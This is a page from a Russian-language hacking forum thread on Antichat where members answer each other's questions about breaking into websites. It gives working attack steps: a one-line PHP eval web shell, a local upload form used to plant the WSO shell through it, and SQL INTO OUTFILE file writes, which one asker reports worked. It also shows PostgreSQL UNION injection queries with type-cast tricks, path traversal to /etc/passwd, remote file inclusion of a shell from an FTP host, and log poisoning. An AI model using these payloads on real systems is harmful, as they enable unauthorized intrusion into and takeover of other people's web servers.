Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 475 of 1207
  1. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    Искать другие способы загрузки файка. Кавычки экранизируются, заюзать инто оутфайл и инто дампфайл не выйдет. Прийдется искать либо админку, если есть возможность залить с нее - все ок, если нет - ищи другие баги, но не факт, что найдешь..
     
    #9481 Ins3t, 25 Oct 2009
    Last edited: 25 Oct 2009
  2. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    140
    Likes Received:
    9
    Reputations:
    0
    outfile работает, но экранируется, админка на все есть.. нужно файл както залить, лью через пхпмайадм
     
    #9482 M1ks, 25 Oct 2009
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    что экранируется? Ты хотя бы <?phpinfo();?> можешь залить? Будет показываться phpinfo() ?
     
    #9483 Pashkela, 25 Oct 2009
  4. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    омг, что значит работает, но екранизируется?
    что экранизируеться?
    излагай проблему подробно, дабы тебе смогли помочь.
     
    #9484 Ins3t, 25 Oct 2009
  5. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    140
    Likes Received:
    9
    Reputations:
    0
    да, можно... кмд шел даже залил
    там стоит
    magic_quotes_sybase = On
    добавляются \ в кавычках, я писал выше
     
    #9485 M1ks, 25 Oct 2009
  6. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Если работает outfile, но файл не прочитать - может просто-напросто прав на чтение нет в этот каталог? О_о

    Или то, что записывается - просто глюк.
     
    #9486 keng, 25 Oct 2009
  7. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    140
    Likes Received:
    9
    Reputations:
    0
    записывается, но когда пытаюсь wso залить шел, ошибки
    Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\results.php on line 1
    итд
     
    #9487 M1ks, 25 Oct 2009
  8. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Покажи запрос, которым заливаешь. Возможно, лишний слеш поставил.
     
    #9488 keng, 25 Oct 2009
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    тогда лей wso без html-вставок, последняя версия:

    https://forum.antichat.ru/threadedpost1624918.html#post1624918

    1. Заливаешь такой шелл:

    <?eval(stripslashes($_GET[e]));?>

    2. Проверяешь:

    Code:
    http://site.com/имя_твоего_шелла&e=phpinfo();
    или

    Code:
    http://site.com/имя_твоего_шелла?e=phpinfo();
    по разному бывает

    3. У себя на компе такую локальную форму творишь (обзываешь .html):

    Code:
    <form action=http://site.com/имя_твоего_шелла&e=copy($_FILES[file][tmp_name],$_GET[aa]);&aa=/www/тут_полный_абсолютный_путь_до_папки_с_правами_на_запись/shell.php
 method=post enctype=multipart/form-data>
<input type=file name=file><br> 
<input type=submit value=Загрузить><br>
</form>
    4. Запускаешь и льешь wso, всё
     
    #9489 Pashkela, 25 Oct 2009
    Last edited: 25 Oct 2009
    1 person likes this.
  10. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    140
    Likes Received:
    9
    Reputations:
    0
    SELECT 'код шелла' FROM `table` INTO OUTFILE 'путь'
     
    #9490 M1ks, 25 Oct 2009
  11. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    140
    Likes Received:
    9
    Reputations:
    0
    Pashkela.
    Спасибо, получилось
     
    #9491 M1ks, 25 Oct 2009
  12. GenTao

    GenTao New Member

    Joined:
    10 Oct 2009
    Messages:
    123
    Likes Received:
    2
    Reputations:
    -3
    Code:
    ERROR: UNION types double precision and character varying cannot be matched
    БД: PostgreSql. Как проводить запросы в таком случае ?
     
    #9492 GenTao, 25 Oct 2009
  13. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    в PG в union надо соблюсти не только количество полей но и их типы
     
    #9493 Scipio, 25 Oct 2009
    1 person likes this.
  14. GenTao

    GenTao New Member

    Joined:
    10 Oct 2009
    Messages:
    123
    Likes Received:
    2
    Reputations:
    -3
    я cast() уже перепробовал.Какой конкретный запрос ?

    1+union+select+table_name+from+information_schema.tables+limit+1+offset+1----

    Вышла такая хня.В ascii переводить чтоли.
     
    #9494 GenTao, 25 Oct 2009
    Last edited: 25 Oct 2009
  15. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    1;select+table_name::text::int+from+information_schema. tables
     
    #9495 Spyder, 25 Oct 2009
  16. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Привет!
    Подскажите плз, почему не пашет РФИ?
    script.php?bla=../../../etc/passwd
    ВСЕ ОК, а рфи не провелица:

    script.php?bla=ftp://login:pwd@host/shell.php

    Помогите плз.
     
    #9496 -m0rgan-, 25 Oct 2009
  17. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Тебе никто не даст точного ответа.
    Слишком мало информации даешь.
    Может быть несколько вариантов, почему не пашет:
    1. отключен удаленный инклуд
    2. невозможн рфи потому что в скрипте инклудится include("some_dir/".$bla)
     
    #9497 AFoST, 25 Oct 2009
  18. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Или на http и ftp проверка.

    Пробуй через логи.
     
    #9498 Ctacok, 25 Oct 2009
    Last edited: 27 Oct 2009
  19. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Что значит "Через логи" ?
    Можна поподробнее?
     
    #9499 -m0rgan-, 25 Oct 2009
  20. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    Это значит записать в лог об ошибках код на подобии <? phpinfo(); die(); ?> и проинклюдить файл.
     
    #9500 Aртем, 25 Oct 2009
    4 people like this.
(You must log in or sign up to post here.)
Page 475 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.